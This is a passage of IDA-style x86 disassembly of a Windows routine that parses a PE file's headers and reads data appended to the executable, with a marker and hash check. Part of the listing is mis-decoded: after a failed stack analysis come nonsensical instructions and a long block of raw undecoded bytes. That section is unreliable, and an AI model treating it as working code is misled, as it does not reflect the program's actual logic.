arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F420
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFCE0h
push ebx
push esi
push edi
mov [ebp+var_20], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov [ebp+var_1C], ecx
mov [ebp+var_28], 0FFFFFFFFh
mov [ebp+var_24], 0
mov [ebp+var_4], 0
push 0
push 0
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+arg_0]
push eax
call ds:dword_4A26A8 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_494690
mov ecx, 0EF000005h
call sub_499342
loc_494690: ; CODE XREF: sub_494610+74�j
push 0
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4A2700 ; GetFileSize
mov [ebp+var_54], eax
mov [ebp+var_78], 0
mov edx, [ebp+arg_8]
and edx, 0FFh
test edx, edx
jz loc_49492F
mov eax, ds:dword_4A2684
mov ecx, [eax+24h]
and ecx, 2
test ecx, ecx
jnz loc_49492F
mov edx, ds:dword_4A2684
mov eax, [edx+4]
mov [ebp+var_88], eax
mov ecx, [ebp+var_88]
mov edx, [ebp+var_88]
add edx, [ecx+3Ch]
mov ds:dword_4A2910, edx
mov eax, ds:dword_4A2910
cmp dword ptr [eax], 4550h
jz short loc_494705
mov ecx, 0EF000002h
call sub_499342
loc_494705: ; CODE XREF: sub_494610+E9�j
mov ecx, ds:dword_4A2910
xor edx, edx
mov dx, [ecx+14h]
mov eax, ds:dword_4A2910
lea ecx, [eax+edx+18h]
mov [ebp+var_84], ecx
mov edx, ds:dword_4A2910
add edx, 98h
mov [ebp+var_7C], edx
mov [ebp+var_8C], 0
mov eax, ds:dword_4A2910
xor ecx, ecx
mov cx, [eax+6]
mov [ebp+var_80], ecx
jmp short loc_494752
; ---------------------------------------------------------------------------
loc_494749: ; CODE XREF: sub_494610:loc_494782�j
mov edx, [ebp+var_80]
sub edx, 1
mov [ebp+var_80], edx
loc_494752: ; CODE XREF: sub_494610+137�j
cmp [ebp+var_80], 0
jl loc_494893
mov eax, [ebp+var_80]
imul eax, 28h
mov ecx, [ebp+var_84]
cmp dword ptr [ecx+eax+10h], 0
jz short loc_494782
mov edx, [ebp+var_80]
imul edx, 28h
mov eax, [ebp+var_84]
cmp dword ptr [eax+edx+14h], 0
jnz short loc_494784
loc_494782: ; CODE XREF: sub_494610+15D�j
jmp short loc_494749
; ---------------------------------------------------------------------------
loc_494784: ; CODE XREF: sub_494610+170�j
mov ecx, [ebp+var_80]
imul ecx, 28h
mov edx, [ebp+var_80]
imul edx, 28h
mov eax, [ebp+var_84]
mov edx, [eax+edx+10h]
mov eax, ds:dword_4A2910
mov eax, [eax+3Ch]
lea edx, [edx+eax-1]
mov eax, ds:dword_4A2910
mov eax, [eax+3Ch]
sub eax, 1
not eax
and edx, eax
mov eax, [ebp+var_84]
mov ecx, [eax+ecx+14h]
add ecx, edx
mov [ebp+var_8C], ecx
push 0
push 0
mov edx, [ebp+var_8C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A2788 ; SetFilePointer
mov [ebp+var_B4], eax
push 0
lea ecx, [ebp+var_90]
push ecx
push 20h
lea edx, [ebp+var_B0]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz loc_494893
cmp [ebp+var_90], 20h
jnz loc_494893
lea ecx, [ebp+var_130]
call sub_498798
push 10h
lea ecx, [ebp+var_B0]
push ecx
lea ecx, [ebp+var_130]
call sub_4987A4
lea edx, [ebp+var_C4]
push edx
lea ecx, [ebp+var_130]
call sub_49885D
mov ecx, 4
lea edi, [ebp+var_A0]
lea esi, [ebp+var_C4]
xor eax, eax
repe cmpsd
jnz short loc_494893
mov ecx, [ebp+var_8C]
add ecx, [ebp+var_B0]
mov [ebp+var_78], ecx
push 2
push 0
push 0
mov edx, [ebp+var_28]
push edx
call ds:dword_4A2788 ; SetFilePointer
mov [ebp+var_134], eax
mov eax, [ebp+var_134]
sub eax, [ebp+var_78]
neg eax
mov [ebp+var_78], eax
jmp loc_49492F
; ---------------------------------------------------------------------------
loc_494893: ; CODE XREF: sub_494610+146�j
; sub_494610+1F0�j ...
mov ecx, [ebp+var_7C]
cmp dword ptr [ecx], 0
jz loc_49492F
mov edx, [ebp+var_7C]
cmp dword ptr [edx+4], 0
jz loc_49492F
mov eax, [ebp+var_7C]
mov ecx, [ebp+var_54]
sub ecx, [eax]
neg ecx
mov [ebp+var_78], ecx
mov edx, [ebp+var_7C]
mov eax, [edx]
mov [ebp+var_54], eax
mov [ebp+var_138], 0
loc_4948CB: ; CODE XREF: sub_494610+31D�j
push 2
push 0
mov ecx, [ebp+var_78]
sub ecx, 1
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4A2788 ; SetFilePointer
mov [ebp+var_140], eax
push 0
lea eax, [ebp+var_13C]
push eax
push 1
lea ecx, [ebp+var_138]
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4A277C ; ReadFile
test eax, eax
jnz short loc_494910
mov ecx, 0EF000006h
call sub_499342
loc_494910: ; CODE XREF: sub_494610+2F4�j
cmp [ebp+var_138], 0
jz short loc_49491B
jmp short loc_49492F
; ---------------------------------------------------------------------------
loc_49491B: ; CODE XREF: sub_494610+307�j
mov eax, [ebp+var_78]
sub eax, 1
mov [ebp+var_78], eax
mov ecx, [ebp+var_54]
sub ecx, 1
mov [ebp+var_54], ecx
jmp short loc_4948CB
; ---------------------------------------------------------------------------
loc_49492F: ; CODE XREF: sub_494610+A1�j
; sub_494610+B4�j ...
push 2
push 0
mov edx, [ebp+var_78]
sub edx, 4
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A2788 ; SetFilePointer
mov [ebp+var_74], eax
mov ecx, [ebp+var_54]
add ecx, [ebp+var_78]
mov [ebp+var_54], ecx
mov [ebp+var_144], 0
push 0
lea edx, [ebp+var_144]
push edx
push 4
lea eax, [ebp+var_148]
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494983
cmp [ebp+var_144], 4
jz short loc_49498D
loc_494983: ; CODE XREF: sub_494610+368�j
mov ecx, 0EF000006h
call sub_499342
loc_49498D: ; CODE XREF: sub_494610+371�j
cmp [ebp+var_148], 0CAFEBABEh
jz short loc_4949B0
mov edx, [ebp+var_148]
xor edx, 0CAFEBABEh
xor edx, [ebp+var_54]
mov [ebp+var_308], edx
jmp short loc_4949BB
; ---------------------------------------------------------------------------
loc_4949B0: ; CODE XREF: sub_494610+387�j
mov eax, ds:dword_4A1BD8
mov [ebp+var_308], eax
loc_4949BB: ; CODE XREF: sub_494610+39E�j
mov ecx, [ebp+var_308]
mov [ebp+var_14C], ecx
mov edx, [ebp+arg_4]
and edx, 0FFh
test edx, edx
jz short loc_4949EF
mov eax, offset dword_4A1BD8
lea ecx, [ebp+var_14C]
mov edx, [ecx]
cmp edx, [eax]
jz short loc_4949EF
mov ecx, 0EF000007h
call sub_499342
loc_4949EF: ; CODE XREF: sub_494610+3C2�j
; sub_494610+3D3�j
push 2
push 0
mov eax, [ebp+var_78]
sub eax, 14h
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4A2788 ; SetFilePointer
mov [ebp+var_150], 0
push 0
lea edx, [ebp+var_150]
push edx
push 10h
lea eax, [ebp+var_4C]
push eax
mov ecx, [ebp+var_28]
push ecx
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494A34
cmp [ebp+var_150], 10h
jz short loc_494A3E
loc_494A34: ; CODE XREF: sub_494610+419�j
mov ecx, 0EF000006h
call sub_499342
loc_494A3E: ; CODE XREF: sub_494610+422�j
mov edx, [ebp+arg_8]
and edx, 0FFh
neg edx
sbb edx, edx
and edx, 0Ch
mov [ebp+var_68], edx
push 2
push 0
mov eax, [ebp+var_68]
add eax, 2Ch
mov ecx, [ebp+var_78]
sub ecx, eax
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4A2788 ; SetFilePointer
mov [ebp+var_154], 0
mov eax, [ebp+arg_8]
and eax, 0FFh
test eax, eax
jz loc_494B15
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_34]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494AAB
cmp [ebp+var_154], 4
jz short loc_494AB5
loc_494AAB: ; CODE XREF: sub_494610+490�j
mov ecx, 0EF000006h
call sub_499342
loc_494AB5: ; CODE XREF: sub_494610+499�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_50]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494ADB
cmp [ebp+var_154], 4
jz short loc_494AE5
loc_494ADB: ; CODE XREF: sub_494610+4C0�j
mov ecx, 0EF000006h
call sub_499342
loc_494AE5: ; CODE XREF: sub_494610+4C9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494B0B
cmp [ebp+var_154], 4
jz short loc_494B15
loc_494B0B: ; CODE XREF: sub_494610+4F0�j
mov ecx, 0EF000006h
call sub_499342
loc_494B15: ; CODE XREF: sub_494610+46F�j
; sub_494610+4F9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_60]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494B3B
cmp [ebp+var_154], 4
jz short loc_494B45
loc_494B3B: ; CODE XREF: sub_494610+520�j
mov ecx, 0EF000006h
call sub_499342
loc_494B45: ; CODE XREF: sub_494610+529�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_70]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494B6B
cmp [ebp+var_154], 4
jz short loc_494B75
loc_494B6B: ; CODE XREF: sub_494610+550�j
mov ecx, 0EF000006h
call sub_499342
loc_494B75: ; CODE XREF: sub_494610+559�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494B9B
cmp [ebp+var_154], 4
jz short loc_494BA5
loc_494B9B: ; CODE XREF: sub_494610+580�j
mov ecx, 0EF000006h
call sub_499342
loc_494BA5: ; CODE XREF: sub_494610+589�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_64]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494BCB
cmp [ebp+var_154], 4
jz short loc_494BD5
loc_494BCB: ; CODE XREF: sub_494610+5B0�j
mov ecx, 0EF000006h
call sub_499342
loc_494BD5: ; CODE XREF: sub_494610+5B9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_6C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494BFB
cmp [ebp+var_154], 4
jz short loc_494C05
loc_494BFB: ; CODE XREF: sub_494610+5E0�j
mov ecx, 0EF000006h
call sub_499342
loc_494C05: ; CODE XREF: sub_494610+5E9�j
push 0
lea ecx, [ebp+var_154]
push ecx
push 4
lea edx, [ebp+var_58]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A277C ; ReadFile
test eax, eax
jz short loc_494C2B
cmp [ebp+var_154], 4
jz short loc_494C35
loc_494C2B: ; CODE XREF: sub_494610+610�j
mov ecx, 0EF000006h
call sub_499342
loc_494C35: ; CODE XREF: sub_494610+619�j
mov ecx, [ebp+arg_8]
and ecx, 0FFh
test ecx, ecx
jz loc_494E52
cmp [ebp+var_50], 0
jz loc_494E52
cmp [ebp+var_34], 0
jz loc_494E52
push 24h
call sub_49935A
add esp, 4
mov [ebp+var_2D8], eax
mov edx, [ebp+var_2D8]
mov [ebp+var_158], edx
mov eax, [ebp+var_1C]
add eax, 1
push eax
call sub_49935A
add esp, 4
mov [ebp+var_2DC], eax
mov ecx, [ebp+var_158]
mov edx, [ebp+var_2DC]
mov [ecx+0Ch], edx
mov ecx, [ebp+var_1C]
add ecx, 1
mov esi, [ebp+arg_0]
mov eax, [ebp+var_158]
mov edi, [eax+0Ch]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_158]
mov dword ptr [eax], 0
push 10h
call sub_49935A
add esp, 4
mov [ebp+var_2E0], eax
mov ecx, [ebp+var_158]
mov edx, [ebp+var_2E0]
mov [ecx+4], edx
push 4
call sub_49935A
add esp, 4
mov [ebp+var_2E4], eax
mov eax, [ebp+var_158]
mov ecx, [ebp+var_2E4]
mov [eax+8], ecx
mov edx, [ebp+var_158]
mov dword ptr [edx+18h], 1
mov eax, [ebp+var_158]
mov dword ptr [eax+14h], 0
push 0
push 0
mov ecx, [ebp+var_158]
add ecx, 1Ch
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4A2704 ; GetFileTime
mov edi, ds:dword_4A290C
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
add ecx, 0FFFFFFFFh
mov eax, ds:dword_4A2908
sub ecx, [eax+0C14h]
mov [ebp+var_15C], ecx
mov ecx, [ebp+var_15C]
add ecx, 1
push ecx
call sub_49935A
add esp, 4
mov [ebp+var_2E8], eax
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_2E8]
mov [eax], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_158]
mov edx, [ecx+8]
mov eax, [eax]
mov [edx], eax
mov ecx, [ebp+var_15C]
add ecx, 1
mov edx, ds:dword_4A2908
mov esi, ds:dword_4A290C
add esi, [edx+0C14h]
mov eax, [ebp+var_158]
mov edx, [eax+8]
mov edi, [edx]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_15C]
push ecx
mov edx, [ebp+var_158]
mov eax, [edx+8]
mov ecx, [eax]
push ecx
call ds:dword_4A27C8 ; CharUpperBuffA
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_34]
mov [eax+4], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_50]
mov [eax+8], ecx
mov edx, [ebp+var_158]
mov eax, [edx+4]
mov ecx, [ebp+var_38]
mov [eax+0Ch], ecx
mov edx, ds:dword_4A2908
mov [ebp+var_160], edx
mov eax, [ebp+var_158]
mov ecx, [ebp+var_160]
mov edx, [ecx]
mov [eax+10h], edx
mov eax, [ebp+var_160]
mov ecx, [ebp+var_158]
mov [eax], ecx
mov edx, ds:dword_4A2908
mov eax, [edx+4]
add eax, 1
mov ecx, ds:dword_4A2908
mov [ecx+4], eax
loc_494E52: ; CODE XREF: sub_494610+630�j
; sub_494610+63A�j ...
mov edx, [ebp+var_54]
sub edx, [ebp+var_58]
mov [ebp+var_58], edx
mov eax, [ebp+var_3C]
add eax, [ebp+var_58]
mov [ebp+var_3C], eax
mov ecx, [ebp+var_54]
sub ecx, [ebp+var_3C]
test ecx, ecx
jb short loc_494E79
mov edx, [ebp+var_54]
sub edx, [ebp+var_3C]
cmp [ebp+var_60], edx
jbe short loc_494E83
loc_494E79: ; CODE XREF: sub_494610+85C�j
mov ecx, 0EF000007h
call sub_499342
loc_494E83: ; CODE XREF: sub_494610+867�j
mov eax, [ebp+var_60]
push eax
call sub_49935A
add esp, 4
mov [ebp+var_2EC], eax
mov ecx, [ebp+var_2EC]
mov [ebp+var_24], ecx
mov [ebp+var_234], 0
mov [ebp+var_238], 0
push 0
push 0
mov edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_28]
push eax
call ds:dword_4A2788 ; SetFilePointer
loc_494EC4: ; CODE XREF: sub_494610+90A�j
mov ecx, [ebp+var_238]
cmp ecx, [ebp+var_60]
jz short loc_494F1C
mov [ebp+var_234], 0
push 0
lea edx, [ebp+var_234]
push edx
mov eax, [ebp+var_60]
sub eax, [ebp+var_238]
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+var_28]
push edx
call ds:dword_4A277C ; ReadFile
test eax, eax
jnz short loc_494F08
mov ecx, 0EF000006h
call sub_499342
loc_494F08: ; CODE XREF: sub_494610+8EC�j
mov eax, [ebp+var_238]
add eax, [ebp+var_234]
mov [ebp+var_238], eax
jmp short loc_494EC4
; ---------------------------------------------------------------------------
loc_494F1C: ; CODE XREF: sub_494610+8BD�j
push 120000h
call sub_48EB7E
fxch4 st(2)
push esp
mov ebp, 46EE4704h
fst st
iret
sub_494610 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0F5h, 0E9h, 1Eh
dd 0D5E28C45h, 8C62D4A7h, 7CF0AAEEh, 8C9F283Eh, 0D6A56BD3h
dd 7F01D584h, 9F85C5B6h, 0E7618390h, 0A2424F41h, 0FED9E4FEh
dd 0CDB905E3h, 55C9DCC0h, 0EF5F05A1h, 6E843F49h, 52F6001Ah
dd 67F55184h, 978DDDCEh, 1D797B88h, 0BA3A4746h, 6F9ECF7h
dd 0C5B6D5FBh, 339090B8h, 75D285D2h, 4C8D8DEEh, 0E8FFFFFDh
dd 37FCh, 50A0458Bh, 51DC4D8Bh, 0FD4C8D8Dh, 0F5E8FFFFh
dd 8D000037h, 0FFFDB895h, 8D8D52FFh, 0FFFFFD4Ch, 389CE8h
dd 4B900h, 0BD8D0000h, 0FFFFFDB8h, 33B4758Dh, 74A7F3C0h
dd 7B90Ah, 63E8EF00h, 6A000043h, 4374E824h, 0C4830000h
dd 10858904h, 8BFFFFFDh, 0FFFD108Dh, 0E04D89FFh, 83E4558Bh
dd 0E85201C2h, 4356h, 8904C483h, 0FFFD0C85h, 0E0458BFFh
dd 0FD0C8D8Bh, 4889FFFFh, 0E44D8B0Ch, 8B01C183h, 558B0875h
dd 0C7A8BE0h, 0E9C1C18Bh, 8BA5F302h, 3E183C8h, 4D8BA4F3h
dd 0DC558BE0h, 458B1189h, 9C4503DCh, 89E04D8Bh, 558B0441h
dd 2E2C194h, 4304E852h, 0C4830000h, 8858904h, 8BFFFFFDh
dd 8D8BE045h, 0FFFFFD08h, 8B084889h, 458BE055h, 18428994h
dd 0C7E04D8Bh, 1441h, 558D0000h, 458D52D0h, 4D8B50D0h
dd 1CC183E0h, 0D8558B51h, 415FF52h, 8B004A27h, 7883E045h
dd 16750020h, 83E04D8Bh, 75001C79h, 0E0558B0Dh, 521CC283h
dd 272C15FFh, 45C7004Ah, 0A4h, 8B09EB00h, 0C083A445h, 0A4458901h
dd 3BA44D8Bh, 830F944Dh, 0E3h, 0C1A4558Bh, 458B04E2h, 4488BE0h
dd 3DC458Bh, 4D8B1104h, 4E1C1A4h, 8BE0558Bh, 4890452h
dd 0A4458B0Ah, 8B04E0C1h, 518BE04Dh, 23C8B04h, 33FFC983h
dd 0F7AEF2C0h, 0FFC183D1h, 0FD488D89h, 858BFFFFh, 0FFFFFD48h
dd 5001C083h, 4235E8h, 4C48300h, 0FD048589h, 4D8BFFFFh
dd 8518BE0h, 8BA4458Bh, 0FFFD048Dh, 820C89FFh, 0FD488D8Bh
dd 0C183FFFFh, 0A4558B01h, 8B04E2C1h, 408BE045h, 10348B04h
dd 8BE0558Bh, 558B0842h, 903C8BA4h, 0E9C1C18Bh, 8BA5F302h
dd 3E183C8h, 8D8BA4F3h, 0FFFFFD48h, 0A4558B51h, 8B04E2C1h
dd 488BE045h, 11148B04h, 0C815FF52h, 8B004A27h, 0E0C1A445h
dd 0E04D8B04h, 8B04518Bh, 3040244h, 4D8BA845h, 4E1C1A4h
dd 8BE0558Bh, 44890452h, 8E9040Ah, 8BFFFFFFh, 4503DC45h
dd 0FC7881A0h, 0FEFEFEFEh, 0A7850Fh, 4D8B0000h, 0A04D03DCh
dd 89F8518Bh, 0FFFD3C95h, 0DC458BFFh, 8BA04503h, 8D89F448h
dd 0FFFFFD40h, 3DC558Bh, 0FFFD4095h, 449589FFh, 0C7FFFFFDh
dd 0FFFD3885h, 0FFh, 8B0FEB00h, 0FFFD3885h, 1C083FFh, 0FD388589h
dd 8D8BFFFFh, 0FFFFFD38h, 0FD3C8D3Bh, 3A73FFFFh, 0FD38958Bh
dd 0D26BFFFFh, 44858B18h, 3FFFFFDh, 348589C2h, 8BFFFFFDh
dd 0FFFD348Dh, 0DC558BFFh, 8B105103h, 0FFFD3485h, 105089FFh
dd 0FD348D8Bh, 8D89FFFFh, 0FFFFFD30h, 958BA9EBh, 0FFFFFD44h
dd 28F01589h, 858B004Ah, 0FFFFFD3Ch, 4A28F4A3h, 80D8B00h
dd 89004A29h, 0FFFD2C8Dh, 2C958BFFh, 83FFFFFDh, 840F003Ah
dd 152h, 8908458Bh, 0FFFCF485h, 2C8D8BFFh, 8BFFFFFDh, 0C428B11h
dd 0FCF08589h, 8D8BFFFFh, 0FFFFFCF0h, 9588118Ah, 0FFFFFCEFh
dd 0FCF4858Bh, 103AFFFFh, 0BD804675h, 0FFFFFCEFh, 8B317400h
dd 0FFFCF08Dh, 1518AFFh, 0FCEE9588h, 858BFFFFh, 0FFFFFCF4h
dd 7501503Ah, 0F0858323h, 2FFFFFCh, 0FCF48583h, 8002FFFFh
dd 0FFFCEEBDh, 0AE7500FFh, 0FCE885C7h, 0FFFFh, 0BEB0000h
dd 0D983C91Bh, 0E88D89FFh, 8BFFFFFCh, 0FFFCE895h, 0E49589FFh
dd 83FFFFFCh, 0FFFCE4BDh, 57D00FFh, 0B5E9h, 2908A100h
dd 0C083004Ah, 0E0858910h, 8BFFFFFCh, 0FFFD2C8Dh, 8B118BFFh
dd 85890C42h, 0FFFFFCDCh, 0FCDC8D8Bh, 118AFFFFh, 0FCDB9588h
dd 858BFFFFh, 0FFFFFCE0h, 4675103Ah, 0FCDBBD80h, 7400FFFFh
dd 0DC8D8B31h, 8AFFFFFCh, 95880151h, 0FFFFFCDAh, 0FCE0858Bh
dd 503AFFFFh, 83237501h, 0FFFCDC85h, 858302FFh, 0FFFFFCE0h
dd 0DABD8002h, 0FFFFFCh, 85C7AE75h, 0FFFFFCD4h, 0
; ---------------------------------------------------------------------------
jmp short loc_4953B1
; ---------------------------------------------------------------------------
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
mov [ebp-32Ch], ecx
loc_4953B1: ; CODE XREF: _4:004953A4�j
mov edx, [ebp-32Ch]
mov [ebp-330h], edx
cmp dword ptr [ebp-330h], 0
jnz short loc_4953C8
jmp short loc_4953DE
; ---------------------------------------------------------------------------
loc_4953C8: ; CODE XREF: _4:004953C4�j
mov eax, [ebp-2D4h]
mov ecx, [eax]
add ecx, 10h
mov [ebp-2D4h], ecx
jmp near ptr dword_494F34+349h
; ---------------------------------------------------------------------------
loc_4953DE: ; CODE XREF: _4:004953C6�j
mov edx, [ebp-20h]
mov eax, [ebp-2D4h]
mov ecx, [eax]
mov [edx+10h], ecx
mov edx, [ebp-2D4h]
mov eax, [ebp-20h]
mov [edx], eax
mov ecx, ds:dword_4A2908
mov edx, [ecx+4]
add edx, [ebp-6Ch]
mov eax, ds:dword_4A2908
mov [eax+4], edx
mov dword ptr [ebp-24h], 0
mov dword ptr [ebp-20h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
call sub_495427
jmp short loc_495474
; =============== S U B R O U T I N E =======================================
sub_495427 proc near ; CODE XREF: _4:00495420�p
; DATA XREF: _5:0049F428�o
cmp dword ptr [ebp-28h], 0FFFFFFFFh
jz short loc_495437
mov ecx, [ebp-28h]
push ecx
call ds:dword_4A26A4 ; CloseHandle
loc_495437: ; CODE XREF: sub_495427+4�j
cmp dword ptr [ebp-24h], 0
jz short loc_495455
mov edx, [ebp-24h]
mov [ebp-300h], edx
mov eax, [ebp-300h]
push eax
call sub_4993DD
add esp, 4
loc_495455: ; CODE XREF: sub_495427+14�j
cmp dword ptr [ebp-20h], 0
jz short locret_495473
mov ecx, [ebp-20h]
mov [ebp-304h], ecx
mov edx, [ebp-304h]
push edx
call sub_4993DD
add esp, 4
locret_495473: ; CODE XREF: sub_495427+32�j
retn
sub_495427 endp
; ---------------------------------------------------------------------------
loc_495474: ; CODE XREF: _4:00495425�j
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_495490 proc near ; CODE XREF: sub_493DD0+623�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004956B5 SIZE 00000011 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F430
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_1C], 0
mov [ebp+var_4], 0
mov eax, ds:dword_4A2908
mov dword ptr [eax+0Ch], 0
mov ecx, ds:dword_4A2908
mov edx, [ecx+4]
shl edx, 4
push edx
call sub_49935A
add esp, 4
mov [ebp+var_40], eax
mov eax, [ebp+var_40]
mov [ebp+var_1C], eax
loc_4954EB: ; CODE XREF: sub_495490+1E7�j
mov [ebp+var_34], 0
mov [ebp+var_28], 0
mov [ebp+var_30], 0
mov ecx, ds:dword_4A2908
mov edx, [ecx]
mov [ebp+var_20], edx
jmp short loc_495516
; ---------------------------------------------------------------------------
loc_49550D: ; CODE XREF: sub_495490+9E�j
; sub_495490+132�j ...
mov eax, [ebp+var_20]
mov ecx, [eax+10h]
mov [ebp+var_20], ecx
loc_495516: ; CODE XREF: sub_495490+7B�j
cmp [ebp+var_20], 0
jz loc_4955F9
mov edx, [ebp+var_20]
mov eax, [ebp+var_20]
mov ecx, [edx+14h]
cmp ecx, [eax+18h]
jnz short loc_495530
jmp short loc_49550D
; ---------------------------------------------------------------------------
loc_495530: ; CODE XREF: sub_495490+9C�j
cmp [ebp+var_30], 0
jz loc_4955D2
mov edx, [ebp+var_20]
mov eax, [edx+14h]
shl eax, 4
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
add edx, eax
mov [ebp+var_38], edx
mov eax, [ebp+var_30]
mov [ebp+var_48], eax
mov ecx, [ebp+var_38]
mov edx, [ecx]
mov [ebp+var_4C], edx
loc_49555C: ; CODE XREF: sub_495490+FE�j
mov eax, [ebp+var_4C]
mov cl, [eax]
mov [ebp+var_4D], cl
mov edx, [ebp+var_48]
cmp cl, [edx]
jnz short loc_495599
cmp [ebp+var_4D], 0
jz short loc_495590
mov eax, [ebp+var_4C]
mov cl, [eax+1]
mov [ebp+var_4E], cl
mov edx, [ebp+var_48]
cmp cl, [edx+1]
jnz short loc_495599
add [ebp+var_4C], 2
add [ebp+var_48], 2
cmp [ebp+var_4E], 0
jnz short loc_49555C
loc_495590: ; CODE XREF: sub_495490+DF�j
mov [ebp+var_54], 0
jmp short loc_4955A1
; ---------------------------------------------------------------------------
loc_495599: ; CODE XREF: sub_495490+D9�j
; sub_495490+F0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_54], eax
loc_4955A1: ; CODE XREF: sub_495490+107�j
mov ecx, [ebp+var_54]
mov [ebp+var_58], ecx
mov edx, [ebp+var_58]
mov [ebp+var_3C], edx
cmp [ebp+var_3C], 0
jnz short loc_4955C7
mov eax, [ebp+var_20]
mov ecx, [eax+14h]
add ecx, 1
mov edx, [ebp+var_20]
mov [edx+14h], ecx
jmp loc_49550D
; ---------------------------------------------------------------------------
loc_4955C7: ; CODE XREF: sub_495490+121�j
cmp [ebp+var_3C], 0
jle short loc_4955D2
jmp loc_49550D
; ---------------------------------------------------------------------------
loc_4955D2: ; CODE XREF: sub_495490+A4�j
; sub_495490+13B�j
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
mov ecx, [ebp+var_28]
mov edx, [ecx+14h]
shl edx, 4
mov eax, [ebp+var_28]
mov ecx, [eax+4]
add ecx, edx
mov [ebp+var_34], ecx
mov edx, [ebp+var_34]
mov eax, [edx]
mov [ebp+var_30], eax
jmp loc_49550D
; ---------------------------------------------------------------------------
loc_4955F9: ; CODE XREF: sub_495490+8A�j
cmp [ebp+var_30], 0
jnz short loc_495601
jmp short loc_49567C
; ---------------------------------------------------------------------------
loc_495601: ; CODE XREF: sub_495490+16D�j
mov ecx, ds:dword_4A2908
mov edx, [ecx+0Ch]
shl edx, 4
mov eax, [ebp+var_1C]
add eax, edx
mov [ebp+var_24], eax
mov ecx, [ebp+var_24]
mov edx, [ebp+var_34]
mov [ecx], edx
mov eax, [ebp+var_24]
mov ecx, [ebp+var_28]
mov [eax+0Ch], ecx
mov edx, [ebp+var_24]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_28]
